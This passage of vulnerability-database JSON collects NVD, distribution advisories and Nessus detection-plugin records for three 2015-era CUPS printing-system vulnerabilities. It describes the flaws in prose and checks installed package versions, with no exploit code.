"CVE-2015-1158", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1158", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:cups:cups:2.0.2:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:21:21", "description": "Cross-site scripting (XSS) vulnerability in the cgi_puts function in cgi-bin/template.c in the template engine in CUPS before 2.0.3 allows remote attackers to inject arbitrary web script or HTML via the QUERY parameter to help/.", "edition": 6, "cvss3": {}, "published": "2015-06-26T10:59:00", "title": "CVE-2015-1159", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1159"], "modified": "2017-09-23T01:29:00", "cpe": ["cpe:/a:cups:cups:2.0.2"], "id": "CVE-2015-1159", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1159", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:cups:cups:2.0.2:*:*:*:*:*:*:*"]}], "amazon": [{"lastseen": "2020-11-10T12:36:22", "bulletinFamily": "unix", "cvelist": ["CVE-2014-9679", "CVE-2015-1158", "CVE-2015-1159"], "description": "**Issue Overview:**\n\nA string reference count bug was found in cupsd, causing premature freeing of string objects. An attacker can submit a malicious print job that exploits this flaw to dismantle ACLs protecting privileged operations, allowing a replacement configuration file to be uploaded which in turn allows the attacker to run arbitrary code in the CUPS server ([CVE-2015-1158 __](<https://access.redhat.com/security/cve/CVE-2015-1158>))\n\nA cross-site scripting flaw was found in the cups web templating engine. An attacker could use this flaw to bypass the default configuration settings that bind the CUPS scheduler to the 'localhost' or loopback interface. ([CVE-2015-1159 __](<https://access.redhat.com/security/cve/CVE-2015-1159>))\n\nAn integer overflow leading to a heap-based buffer overflow was found in the way cups handled compressed raster image files. An attacker could create a specially-crafted image file, which when passed via the cups Raster filter, could cause the cups filter to crash. ([CVE-2014-9679 __](<https://access.redhat.com/security/cve/CVE-2014-9679>))\n\n \n**Affected Packages:** \n\n\ncups\n\n \n**Issue Correction:** \nRun _yum update cups_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n cups-debuginfo-1.4.2-67.21.amzn1.i686 \n cups-libs-1.4.2-67.21.amzn1.i686 \n cups-php-1.4.2-67.21.amzn1.i686 \n cups-devel-1.4.2-67.21.amzn1.i686 \n cups-1.4.2-67.21.amzn1.i686 \n cups-lpd-1.4.2-67.21.amzn1.i686 \n \n src: \n cups-1.4.2-67.21.amzn1.src \n \n x86_64: \n cups-debuginfo-1.4.2-67.21.amzn1.x86_64 \n cups-php-1.4.2-67.21.amzn1.x86_64 \n cups-libs-1.4.2-67.21.amzn1.x86_64 \n cups-devel-1.4.2-67.21.amzn1.x86_64 \n cups-1.4.2-67.21.amzn1.x86_64 \n cups-lpd-1.4.2-67.21.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2015-07-07T12:34:00", "published": "2015-07-07T12:34:00", "id": "ALAS-2015-559", "href": "https://alas.aws.amazon.com/ALAS-2015-559.html", "title": "Medium: cups", "type": "amazon", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2014-9679", "CVE-2015-1158", "CVE-2015-1159"], "description": "CUPS printing system provides a portable printing layer for UNIX=C2=AE operating systems. It has been developed by Apple Inc. to promote a standard printing solution for all UNIX vendors and users. CUPS provides the System V and Berkeley command-line interfaces. ", "modified": "2015-06-21T00:36:00", "published": "2015-06-21T00:36:00", "id": "FEDORA:4582460157C8", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 21 Update: cups-1.7.5-17.fc21", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1158", "CVE-2015-1159"], "description": "CUPS printing system provides a portable printing layer for UNIX=C2=AE operating systems. It has been developed by Apple Inc. to promote a standard printing solution for all UNIX vendors and users. CUPS provides the System V and Berkeley command-line interfaces. ", "modified": "2015-06-21T00:21:04", "published": "2015-06-21T00:21:04", "id": "FEDORA:A93F061B695F", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 22 Update: cups-2.0.3-1.fc22", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2014-9679"], "description": "CUPS printing system provides a portable printing layer for UNIX=C2=AE operating systems. It has been developed by Apple Inc. to promote a standard printing solution for all UNIX vendors and users. CUPS provides the System V and Berkeley command-line interfaces. ", "modified": "2015-02-21T04:23:29", "published": "2015-02-21T04:23:29", "id": "FEDORA:06E556087BD6", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 21 Update: cups-1.7.5-15.fc21", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3537", "CVE-2014-5029", "CVE-2014-5030", "CVE-2014-5031", "CVE-2014-9679"], "description": "CUPS printing system provides a portable printing layer for UNIX=C2=AE operating systems. It has been developed by Apple Inc. to promote a standard printing solution for all UNIX vendors and users. CUPS provides the System V and Berkeley command-line interfaces. ", "modified": "2015-02-20T08:33:22", "published": "2015-02-20T08:33:22", "id": "FEDORA:4F41C6087C4D", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: cups-1.7.5-12.fc20", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2019-08-13T18:45:26", "bulletinFamily": "unix", "cvelist": ["CVE-2014-9679", "CVE-2015-1158", "CVE-2015-1159"], "description": "CUPS provides a portable printing layer for Linux, UNIX, and similar\noperating systems.\n\nA string reference count bug was found in cupsd, causing premature freeing\nof string objects. An attacker can submit a malicious print job that\nexploits this flaw to dismantle ACLs protecting privileged operations,\nallowing a replacement configuration file to be uploaded which in turn\nallows the attacker to run arbitrary code in the CUPS server (CVE-2015-1158)\n\nA cross-site scripting flaw was found in the cups web templating engine. An \nattacker could use this flaw to bypass the default configuration settings \nthat bind the CUPS scheduler to the 'localhost' or loopback interface.\n(CVE-2015-1159)\n\nAn integer overflow leading to a heap-based buffer overflow was found in\nthe way cups handled compressed raster image files. An attacker could\ncreate a specially-crafted image file, which when passed via the cups\nRaster filter, could cause the cups filter to crash. (CVE-2014-9679)\n\nRed Hat would like to thank the CERT/CC for reporting CVE-2015-1158 and \nCVE-2015-1159 issues.\n\nAll cups users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing this\nupdate, the cupsd daemon will be restarted automatically.\n", "modified": "2018-06-06T20:24:10", "published": "2015-06-17T04:00:00", "id": "RHSA-2015:1123", "href": "https://access.redhat.com/errata/RHSA-2015:1123", "type": "redhat", "title": "(RHSA-2015:1123) Important: cups security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2019-12-20T18:27:00", "bulletinFamily": "unix", "cvelist": ["CVE-2014-9679", "CVE-2015-1158", "CVE-2015-1159"], "description": "**CentOS Errata and Security Advisory** CESA-2015:1123\n\n\nCUPS provides a portable printing layer for Linux, UNIX, and similar\noperating systems.\n\nA string reference count bug was found in cupsd, causing premature freeing\nof string objects. An attacker can submit a malicious print job that\nexploits this flaw to dismantle ACLs protecting privileged operations,\nallowing a replacement configuration file to be uploaded which in turn\nallows the attacker to run arbitrary code in the CUPS server (CVE-2015-1158)\n\nA cross-site scripting flaw was found in the cups web templating engine. An \nattacker could use this flaw to bypass the default configuration settings \nthat bind the CUPS scheduler to the 'localhost' or loopback interface.\n(CVE-2015-1159)\n\nAn integer overflow leading to a heap-based buffer overflow was found in\nthe way cups handled compressed raster image files. An attacker could\ncreate a specially-crafted image file, which when passed via the cups\nRaster filter, could cause the cups filter to crash. (CVE-2014-9679)\n\nRed Hat would like to thank the CERT/CC for reporting CVE-2015-1158 and \nCVE-2015-1159 issues.\n\nAll cups users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing this\nupdate, the cupsd daemon will be restarted automatically.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2015-June/033216.html\nhttp://lists.centos.org/pipermail/centos-announce/2015-June/033217.html\n\n**Affected packages:**\ncups\ncups-client\ncups-devel\ncups-filesystem\ncups-ipptool\ncups-libs\ncups-lpd\ncups-php\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2015-1123.html", "edition": 3, "modified": "2015-06-18T11:30:45", "published": "2015-06-18T11:29:43", "href": "http://lists.centos.org/pipermail/centos-announce/2015-June/033216.html", "id": "CESA-2015:1123", "title": "cups security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:36:24", "bulletinFamily": "unix", "cvelist": ["CVE-2014-9679", "CVE-2015-1158", "CVE-2015-1159"], "description": "[1:1.4.2-67.1]\n- CVE-2015-1158, CVE-2015-1159, CVE-2014-9679 (bug #1229982).", "edition": 4, "modified": "2015-06-17T00:00:00", "published": "2015-06-17T00:00:00", "id": "ELSA-2015-1123", "href": "http://linux.oracle.com/errata/ELSA-2015-1123.html", "title": "cups security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-02-01T01:21:04", "description": "A string reference count bug was found in cupsd, causing premature\nfreeing of string objects. An attacker can submit a malicious print\njob that exploits this flaw to dismantle ACLs protecting privileged\noperations, allowing a replacement configuration file to be uploaded\nwhich in turn allows the attacker to run arbitrary code in the CUPS\nserver (CVE-2015-1158)\n\nA cross-site scripting flaw was found in the cups web templating\nengine. An attacker could use this flaw to bypass the default\nconfiguration settings that bind the CUPS scheduler to the 'localhost'\nor loopback interface. (CVE-2015-1159)\n\nAn integer overflow leading to a heap-based buffer overflow was found\nin the way cups handled compressed raster image files. An attacker\ncould create a specially crafted image file, which when passed via the\ncups Raster filter, could cause the cups filter to crash.\n(CVE-2014-9679)", "edition": 25, "published": "2015-07-08T00:00:00", "title": "Amazon Linux AMI : cups (ALAS-2015-559)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9679", "CVE-2015-1158", "CVE-2015-1159"], "modified": "2021-02-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:cups-devel", "p-cpe:/a:amazon:linux:cups-libs", "p-cpe:/a:amazon:linux:cups", "p-cpe:/a:amazon:linux:cups-php", "p-cpe:/a:amazon:linux:cups-lpd", "p-cpe:/a:amazon:linux:cups-debuginfo", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2015-559.NASL", "href": "https://www.tenable.com/plugins/nessus/84595", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2015-559.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84595);\n script_version(\"2.2\");\n script_cvs_date(\"Date: 2018/04/18 15:09:35\");\n\n script_cve_id(\"CVE-2014-9679\", \"CVE-2015-1158\", \"CVE-2015-1159\");\n script_xref(name:\"ALAS\", value:\"2015-559\");\n script_xref(name:\"RHSA\", value:\"2015:1123\");\n\n script_name(english:\"Amazon Linux AMI : cups (ALAS-2015-559)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A string reference count bug was found in cupsd, causing premature\nfreeing of string objects. An attacker can submit a malicious print\njob that exploits this flaw to dismantle ACLs protecting privileged\noperations, allowing a replacement configuration file to be uploaded\nwhich in turn allows the attacker to run arbitrary code in the CUPS\nserver (CVE-2015-1158)\n\nA cross-site scripting flaw was found in the cups web templating\nengine. An attacker could use this flaw to bypass the default\nconfiguration settings that bind the CUPS scheduler to the 'localhost'\nor loopback interface. (CVE-2015-1159)\n\nAn integer overflow leading to a heap-based buffer overflow was found\nin the way cups handled compressed raster image files. An attacker\ncould create a specially crafted image file, which when passed via the\ncups Raster filter, could cause the cups filter to crash.\n(CVE-2014-9679)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2015-559.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update cups' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:cups\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:cups-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:cups-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:cups-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:cups-lpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:cups-php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"cups-1.4.2-67.21.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"cups-debuginfo-1.4.2-67.21.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"cups-devel-1.4.2-67.21.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"cups-libs-1.4.2-67.21.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"cups-lpd-1.4.2-67.21.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"cups-php-1.4.2-67.21.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"cups / cups-debuginfo / cups-devel / cups-libs / cups-lpd / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:48:47", "description": "A string reference count bug was found in cupsd, causing premature\nfreeing of string objects. An attacker can submit a malicious print\njob that exploits this flaw to dismantle ACLs protecting privileged\noperations, allowing a replacement configuration file to be uploaded\nwhich in turn allows the attacker to run arbitrary code in the CUPS\nserver (CVE-2015-1158)\n\nA cross-site scripting flaw was found in the cups web templating\nengine. An attacker could use this flaw to bypass the default\nconfiguration settings that bind the CUPS scheduler to the 'localhost'\nor loopback interface. (CVE-2015-1159)\n\nAn integer overflow leading to a heap-based buffer overflow was found\nin the way cups handled compressed raster image files. An attacker\ncould create a specially crafted image file, which when passed via the\ncups Raster filter, could cause the cups filter to crash.\n(CVE-2014-9679)\n\nAfter installing this update, the cupsd daemon will be restarted\nautomatically.", "edition": 15, "published": "2015-06-18T00:00:00", "title": "Scientific Linux Security Update : cups on SL6.x, SL7.x i386/x86_64 (20150617)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9679", "CVE-2015-1158", "CVE-2015-1159"], "modified": "2015-06-18T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:cups-ipptool", "p-cpe:/a:fermilab:scientific_linux:cups-debuginfo", "p-cpe:/a:fermilab:scientific_linux:cups-client", "p-cpe:/a:fermilab:scientific_linux:cups-lpd", "p-cpe:/a:fermilab:scientific_linux:cups-php", "p-cpe:/a:fermilab:scientific_linux:cups-filesystem", "p-cpe:/a:fermilab:scientific_linux:cups-libs", "x-cpe:/o:fermilab:scientific_linux", "p-cpe:/a:fermilab:scientific_linux:cups", "p-cpe:/a:fermilab:scientific_linux:cups-devel"], "id": "SL_20150617_CUPS_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/nessus/84259", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84259);\n script_version(\"2.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-9679\", \"CVE-2015-1158\", \"CVE-2015-1159\");\n\n script_name(english:\"Scientific Linux Security Update : cups on SL6.x, SL7.x i386/x86_64 (20150617)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A string reference count bug was found in cupsd, causing premature\nfreeing of string objects. An attacker can submit a malicious print\njob that exploits this flaw to dismantle ACLs protecting privileged\noperations, allowing a replacement configuration file to be uploaded\nwhich in turn allows the attacker to run arbitrary code in the CUPS\nserver (CVE-2015-1158)\n\nA cross-site scripting flaw was found in the cups web templating\nengine. An attacker could use this flaw to bypass the default\nconfiguration settings that bind the CUPS scheduler to the 'localhost'\nor loopback interface. (CVE-2015-1159)\n\nAn integer overflow leading to a heap-based buffer overflow was found\nin the way cups handled compressed raster image files. An attacker\ncould create a specially crafted image file, which when passed via the\ncups Raster filter, could cause the cups filter to crash.\n(CVE-2014-9679)\n\nAfter installing this update, the cupsd daemon will be restarted\nautomatically.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1506&L=scientific-linux-errata&F=&S=&P=11940\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0667d822\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:cups\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:cups-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:cups-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:cups-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:cups-filesystem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:cups-ipptool\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:cups-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:cups-lpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:cups-php\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/02/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/18\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"cups-1.4.2-67.el6_6.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"cups-debuginfo-1.4.2-67.el6_6.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"cups-devel-1.4.2-67.el6_6.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"cups-libs-1.4.2-67.el6_6.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"cups-lpd-1.4.2-67.el6_6.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"cups-php-1.4.2-67.el6_6.1\")) flag++;\n\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"cups-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"cups-client-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"cups-debuginfo-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"cups-devel-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"cups-filesystem-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"cups-ipptool-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"cups-libs-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"cups-lpd-1.6.3-17.el7_1.1\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"cups / cups-client / cups-debuginfo / cups-devel / cups-filesystem / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-06T13:44:50", "description": "Updated cups packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nCUPS provides a portable printing layer for Linux, UNIX, and similar\noperating systems.\n\nA string reference count bug was found in cupsd, causing premature\nfreeing of string objects. An attacker can submit a malicious print\njob that exploits this flaw to dismantle ACLs protecting privileged\noperations, allowing a replacement configuration file to be uploaded\nwhich in turn allows the attacker to run arbitrary code in the CUPS\nserver (CVE-2015-1158)\n\nA cross-site scripting flaw was found in the cups web templating\nengine. An attacker could use this flaw to bypass the default\nconfiguration settings that bind the CUPS scheduler to the 'localhost'\nor loopback interface. (CVE-2015-1159)\n\nAn integer overflow leading to a heap-based buffer overflow was found\nin the way cups handled compressed raster image files. An attacker\ncould create a specially crafted image file, which when passed via the\ncups Raster filter, could cause the cups filter to crash.\n(CVE-2014-9679)\n\nRed Hat would like to thank the CERT/CC for reporting CVE-2015-1158\nand CVE-2015-1159 issues.\n\nAll cups users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthis update, the cupsd daemon will be restarted automatically.", "edition": 30, "published": "2015-06-18T00:00:00", "title": "RHEL 6 / 7 : cups (RHSA-2015:1123)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9679", "CVE-2015-1158", "CVE-2015-1159"], "modified": "2015-06-18T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:cups-debuginfo", "p-cpe:/a:redhat:enterprise_linux:cups-ipptool", "p-cpe:/a:redhat:enterprise_linux:cups-devel", "p-cpe:/a:redhat:enterprise_linux:cups", "cpe:/o:redhat:enterprise_linux:7.4", "p-cpe:/a:redhat:enterprise_linux:cups-libs", "p-cpe:/a:redhat:enterprise_linux:cups-filesystem", "cpe:/o:redhat:enterprise_linux:7.1", "cpe:/o:redhat:enterprise_linux:7.7", "p-cpe:/a:redhat:enterprise_linux:cups-client", "cpe:/o:redhat:enterprise_linux:7.5", "cpe:/o:redhat:enterprise_linux:6.6", "cpe:/o:redhat:enterprise_linux:7", "cpe:/o:redhat:enterprise_linux:7.3", "cpe:/o:redhat:enterprise_linux:7.2", "cpe:/o:redhat:enterprise_linux:7.6", "cpe:/o:redhat:enterprise_linux:6", "p-cpe:/a:redhat:enterprise_linux:cups-php", "p-cpe:/a:redhat:enterprise_linux:cups-lpd"], "id": "REDHAT-RHSA-2015-1123.NASL", "href": "https://www.tenable.com/plugins/nessus/84258", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:1123. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84258);\n script_version(\"2.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/05\");\n\n script_cve_id(\"CVE-2014-9679\", \"CVE-2015-1158\", \"CVE-2015-1159\");\n script_bugtraq_id(72594, 75098, 75106);\n script_xref(name:\"RHSA\", value:\"2015:1123\");\n\n script_name(english:\"RHEL 6 / 7 : cups (RHSA-2015:1123)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Updated cups packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nCUPS provides a portable printing layer for Linux, UNIX, and similar\noperating systems.\n\nA string reference count bug was found in cupsd, causing premature\nfreeing of string objects. An attacker can submit a malicious print\njob that exploits this flaw to dismantle ACLs protecting privileged\noperations, allowing a replacement configuration file to be uploaded\nwhich in turn allows the attacker to run arbitrary code in the CUPS\nserver (CVE-2015-1158)\n\nA cross-site scripting flaw was found in the cups web templating\nengine. An attacker could use this flaw to bypass the default\nconfiguration settings that bind the 